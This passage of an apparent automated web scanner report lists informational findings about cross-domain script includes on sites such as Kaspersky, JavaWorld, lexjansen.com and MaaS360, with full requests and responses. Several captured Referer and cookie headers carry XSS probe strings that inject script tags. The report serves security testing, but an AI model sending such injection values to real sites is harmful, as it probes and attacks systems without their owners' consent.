<script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2" ></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.simplyhired.com/c/job-widget/js/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=bacca8eba8bded95b5dd46f7a3d8ebc282966537&callback=dbase_parse"></script>
...[SNIP]...

<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/28184/nodetag.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.87. http://www.javaworld.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.javaworld.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.demandbase.com/api/v1/ip.json?token=08b8cb24471b1cc051c579449c9641156b959aaa&callback=OPG.Demandbase.dbase_parse
http://api.recaptcha.net/js/recaptcha_ajax.js
http://jlinks.industrybrains.com/jsct?sid=93&ct=JAVAWORLD_HP_ROS&num=1&layt=10&fmt=simp&tr=premium
http://jlinks.industrybrains.com/jsct?sid=93&ct=JAVAWORLD_HP_ROS&num=5&layt=10&fmt=simp
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET / HTTP/1.1
Host: www.javaworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:06:50 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: public, max-age=600
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46185

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=08b8cb24471b1cc051c579449c9641156b959aaa&callback=OPG.Demandbase.dbase_parse"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</h2>
<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=93&ct=JAVAWORLD_HP_ROS&num=1&layt=10&fmt=simp&tr=premium"></script>
...[SNIP]...
<div style="padding:6px; background-color:#ededed; border:1px solid #D6D3D3; width:634px; margin-top:12px;">
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=93&ct=JAVAWORLD_HP_ROS&num=5&layt=10&fmt=simp"></script>
...[SNIP]...

16.88. http://www.kaspersky.com/for-business previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kaspersky.com
Path:	/for-business

Issue detail

The response dynamically includes the following script from another domain:

http://static.addtoany.com/menu/page.js

Request

GET /for-business HTTP/1.1
Host: www.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 8825
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: Kaspersky Lab
Date: Sun, 04 Sep 2011 14:07:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Kaspersky for Business</tit
...[SNIP]...
</div>
<script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...

16.89. http://www.kaspersky.com/fr/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kaspersky.com
Path:	/fr/

Issue detail

The response dynamically includes the following script from another domain:

http://ld2.criteo.com/criteo_ld.js

Request

GET /fr/ HTTP/1.1
Host: www.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=-1315144922
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 01 Jan 1970 00:05:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Showed: kaspfr:kav:kavxrub=200463296
X-Powered-By: ARR/2.5
X-Powered-By: Kaspersky Lab
Date: Sun, 04 Sep 2011 14:06:58 GMT
Connection: close
Content-Length: 23750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Kaspersky Lab | Anti virus, anti
...[SNIP]...

<script type="text/javascript" src="http://ld2.criteo.com/criteo_ld.js"></script>
...[SNIP]...

16.90. http://www.kaspersky.com/kaspersky-password-manager previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kaspersky.com
Path:	/kaspersky-password-manager

Issue detail

The response dynamically includes the following script from another domain:

http://static.addtoany.com/menu/page.js

Request

GET /kaspersky-password-manager HTTP/1.1
Host: www.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 36472
Content-Type: text/html; charset=utf-8
Location: http://usa.kaspersky.com/products-services/home-computer-security/password-manager
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: Kaspersky Lab
Date: Sun, 04 Sep 2011 14:07:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...
</script>
<script type="text/javascript" src="http://static.addtoany.com/menu/page.js">
</script>
...[SNIP]...

16.91. http://www.kaspersky.com/pure previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kaspersky.com
Path:	/pure

Issue detail

The response dynamically includes the following script from another domain:

http://static.addtoany.com/menu/page.js

Request

GET /pure HTTP/1.1
Host: www.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 8439
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: Kaspersky Lab
Date: Sun, 04 Sep 2011 14:07:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>Kaspersky PURE. Ultimate
...[SNIP]...
</div>
<script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...

16.92. http://www.lexjansen.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lexjansen.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wms.assoc-amazon.com/20070822/US/js/swfobject_1_5.js
http://www.google-analytics.com/urchin.js
http://www.google.com/coop/cse/brand?form=searchbox_011240857950991443104%3Ahsqcj3nokh0

Request

GET / HTTP/1.1
Host: www.lexjansen.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lexjansen.com/vinfo/virusencyclo/default5.asp?2bbdf%3Cscript%3Eprompt(%22Fool%22)%3C/script%3E7cdfa61865a=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:36:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.11
Content-type: text/html
Content-Length: 18687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="
...[SNIP]...
</script>
<script type="text/javascript" src='http://wms.assoc-amazon.com/20070822/US/js/swfobject_1_5.js'></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_011240857950991443104%3Ahsqcj3nokh0"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.93. http://www.lexjansen.com/virus/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lexjansen.com
Path:	/virus/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://securityresponse.symantec.com/avcenter/js/advis.js
http://securityresponse.symantec.com/avcenter/js/tools.js
http://securityresponse.symantec.com/avcenter/js/vir.js
http://securityresponse.symantec.com/avcenter/js/vir_display.js
http://www.google-analytics.com/urchin.js
http://www.kaspersky.com/informer/iactiv.html?id=1
http://www.kaspersky.com/informer/inewsvl.html?id=1
http://www.kaspersky.com/informer/itop10.html?id=2604107
http://www.trendmicro.com/syndication/vinfo/vinfo_data_js2.asp
http://www.trendmicro.com/syndication/wtc/wtc_applet_js.asp

Request

GET /virus/ HTTP/1.1
Host: www.lexjansen.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=site%3Axss.cx+usa.kapersky.com#sclient=psy&hl=en&tbo=1&tbs=qdr:d&source=hp&q=kapersky+xss&pbx=1&oq=kapersky+xss&aq=f&aqi=g-s5&aql=&gs_sm=e&gs_upl=40940l44815l1l44931l28l13l12l0l0l3l1252l5070l4-1.1.2.2l7l0&tbo=1&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 13:54:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.11
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 13:54:45 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Content-Length: 129393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../stylesheet/virus_style.css" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<td valign="top"><script type="text/javascript" language="JavaScript" src="http://www.kaspersky.com/informer/inewsvl.html?id=1"></script></td>
<td valign="top"><script type="text/javascript" language="JavaScript" src="http://www.kaspersky.com/informer/iactiv.html?id=1"></script></td>
<td valign="top"><script type="text/javascript" language="JavaScript" src="http://www.kaspersky.com/informer/itop10.html?id=2604107"></script>
...[SNIP]...
<td>
<script type="text/javascript" language="JavaScript1.1" src="http://www.trendmicro.com/syndication/wtc/wtc_applet_js.asp">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript1.1" src="http://www.trendmicro.com/syndication/vinfo/vinfo_data_js2.asp"></script>
...[SNIP]...
<br />
<script type="text/javascript" src="http://securityresponse.symantec.com/avcenter/js/vir.js"></script>
<script type="text/javascript" src="http://securityresponse.symantec.com/avcenter/js/tools.js"></script>
<script type="text/javascript" src="http://securityresponse.symantec.com/avcenter/js/advis.js"></script>
<script type="text/javascript" src="http://securityresponse.symantec.com/avcenter/js/vir_display.js"></script>
...[SNIP]...

16.94. http://www.maas360.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maas360.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://www.google-analytics.com/ga.js

Request

GET / HTTP/1.1
Host: www.maas360.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fltrk_ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26q%3Df5dba--%3E%3Cscript%3Ealert%28%22DORK%22%29%3C%2Fscript%3Ecebbc660511; fltrk_ref_orig=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26q%3Df5dba--%3E%3Cscript%3Ealert%28%22DORK%22%29%3C%2Fscript%3Ecebbc660511; fltrk_refdom=google; fltrk_refdom_orig=google; PHPSESSID=27d4493fc1281f34f0c3751668188233; _mkto_trk=id:083-YJE-211&token:_mch-maas360.com-1315146809613-13633; __utma=152486630.388950131.1315146814.1315146814.1315146814.1; __utmb=152486630.3.10.1315146814; __utmc=152486630; __utmz=152486630.1315146814.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:34:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate
Set-Cookie: bypassStaticCache=deleted; expires=Sat, 04-Sep-2010 14:34:50 GMT; path=/; httponly
Set-Cookie: bypassStaticCache=deleted; expires=Sat, 04-Sep-2010 14:34:50 GMT; path=/; httponly
Content-Type: text/html; charset="utf-8"
Content-Length: 39447

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html class="Chrome Chrome_535">

<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

16.95. http://www.maas360.com/406.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maas360.com
Path:	/406.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://www.google-analytics.com/ga.js

Request

GET /406.shtml HTTP/1.1
Host: www.maas360.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fltrk_ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26q%3Df5dba--%3E%3Cscript%3Ealert%28%22DORK%22%29%3C%2Fscript%3Ecebbc660511; fltrk_ref_orig=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26q%3Df5dba--%3E%3Cscript%3Ealert%28%22DORK%22%29%3C%2Fscript%3Ecebbc660511; fltrk_refdom=google; fltrk_refdom_orig=google; _mkto_trk=id:083-YJE-211&token:_mch-maas360.com-1315146809613-13633; __utma=152486630.388950131.1315146814.1315146814.1315146814.1; __utmb=152486630.2.10.1315146814; __utmc=152486630; __utmz=152486630.1315146814.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 14:34:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate
Set-Cookie: bypassStaticCache=deleted; expires=Sat, 04-Sep-2010 14:34:40 GMT; path=/; httponly
Set-Cookie: bypassStaticCache=deleted; expires=Sat, 04-Sep-2010 14:34:40 GMT; path=/; httponly
Content-Type: text/html; charset="utf-8"
Content-Length: 39447

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html class="Chrome Chrome_535">

<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

16.96. http://www.maas360.com/themes/maasweb2011/css/form.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.maas360.com
Path:	/themes/maasweb2011/css/form.css

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
http://www.google-analytics.com/ga.js

Request

Response

16.97. http://www.networkworld.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/experience_util.js
http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse
http://apis.google.com/js/plusone.js
http://content.dl-rms.com/rms/mother/575/nodetag.js
http://jlinks.industrybrains.com/jsct?sid=93&ct=NETWORKWORLD_HomePage_and_ROS&num=6&layt=10&fmt=simp
http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET / HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=UTF-8
Expires: Sun, 04 Sep 2011 14:11:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 14:11:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 226188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=beebedc26d45cee0d855facb1672946527973cfd&callback=OPG.Demandbase.dbase_parse"></script>
...[SNIP]...
</script>
<script src="http://admin.brightcove.com/js/experience_util.js" type="text/javascript"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</h3>
<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=93&ct=NETWORKWORLD_HomePage_and_ROS&num=6&layt=10&fmt=simp"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://content.dl-rms.com/rms/mother/575/nodetag.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outblush.com
Path:	/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://outblushcom.skimlinks.com/api/skimlinks.js

Request

GET /|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.outblush.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 11417
Date: Sun, 04 Sep 2011 14:11:24 GMT
Age: 0
Connection: close
Server: IBSrv 1.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

...[SNIP]...
</div>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://outblushcom.skimlinks.com/api/skimlinks.js"></script>
...[SNIP]...

16.99. http://www.phonefactor.com/whitepaper-search-auth-revolution previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.phonefactor.com
Path:	/whitepaper-search-auth-revolution

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js
https://lct.salesforce.com/sfga.js
https://server2gateway.clickandchat.com/include.js?domain=www.phonefactor.com
https://www.googleadservices.com/pagead/conversion.js

Request

GET /whitepaper-search-auth-revolution HTTP/1.1
Host: www.phonefactor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:11:39 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny13 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.phonefactor.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whitepaper – Sear
...[SNIP]...
</script> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script>
...[SNIP]...
</div> <script type='text/javascript' src='https://server2gateway.clickandchat.com/include.js?domain=www.phonefactor.com'></script>
...[SNIP]...
</script> <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script> <SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></script>
...[SNIP]...

16.100. http://www.qualys.com/forms/trials/qualysguard_free_scan/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.qualys.com
Path:	/forms/trials/qualysguard_free_scan/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.6.2.min.js
http://d1dejaj6dcqv24.cloudfront.net/js/jquery.nyroModal-1.6.2.pack.js
https://trackalyzer.com/trackalyze_secure.js

Request

GET /forms/trials/qualysguard_free_scan/ HTTP/1.1
Host: www.qualys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:11:42 GMT
Server: corpweb/3.3a.QEL4
Vary: *
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 29381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <li
...[SNIP]...
<link href="/css/nyroModal.css" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="//ajax.aspnetcdn.com/ajax/jQuery/jquery-1.6.2.min.js"></script> <script type="text/javascript" src="//d1dejaj6dcqv24.cloudfront.net/js/jquery.nyroModal-1.6.2.pack.js"></script>
...[SNIP]...
</script> <script type="text/javascript" src="//d1dejaj6dcqv24.cloudfront.net/js/jquery.nyroModal-1.6.2.pack.js"></script>
...[SNIP]...
</script> <script type="text/javascript" language="javascript" src="https://trackalyzer.com/trackalyze_secure.js"></script>
...[SNIP]...

16.101. http://www.qualys.com/forms/trials/qualysguard_freescan_landing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.qualys.com
Path:	/forms/trials/qualysguard_freescan_landing/

Issue detail

The response dynamically includes the following script from another domain:

http://d1dejaj6dcqv24.cloudfront.net/js/jquery.nyroModal-1.6.2.pack.js

Request

GET /forms/trials/qualysguard_freescan_landing/ HTTP/1.1
Host: www.qualys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.102. http://www.scmagazine.com.au/News/268907,kaspersky-website-vulnerable-to-xss.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scmagazine.com.au
Path:	/News/268907,kaspersky-website-vulnerable-to-xss.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/scmagazine/popular_threads_widget.js?num_items=10
http://disqus.com/forums/scmagazine/recent_comments_widget.js?num_items=5&hide_avatars=1&avatar_size=32&excerpt_length=200
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.linkedin.com/in.js
http://platform.twitter.com/widgets.js
http://s7.addthis.com/js/152/addthis_widget.js
http://secure-au.imrworldwide.com/v53.js
http://widgets.twimg.com/j/2/widget.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 12:12:50 GMT
Content-Length: 102651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Kaspersky
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<span class="linkedin-button">
<script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</legend>
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div id="twitter-following">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<div class="dsq-widget"><script type="text/javascript" src="http://disqus.com/forums/scmagazine/recent_comments_widget.js?num_items=5&hide_avatars=1&avatar_size=32&excerpt_length=200"></script>
...[SNIP]...
<div class="dsq-widget"><script type="text/javascript" src="http://disqus.com/forums/scmagazine/popular_threads_widget.js?num_items=10"></script>
...[SNIP]...
</legend>
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//secure-au.imrworldwide.com/v53.js"></script>
...[SNIP]...

16.103. http://www.scmagazine.com.au/Tools/Email.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.scmagazine.com.au
Path:	/Tools/Email.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/scmagazine/popular_threads_widget.js?num_items=10
http://disqus.com/forums/scmagazine/recent_comments_widget.js?num_items=5&hide_avatars=1&avatar_size=32&excerpt_length=200
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://secure-au.imrworldwide.com/v53.js
http://widgets.twimg.com/j/2/widget.js

Request

GET /Tools/Email.aspx HTTP/1.1
Host: www.scmagazine.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
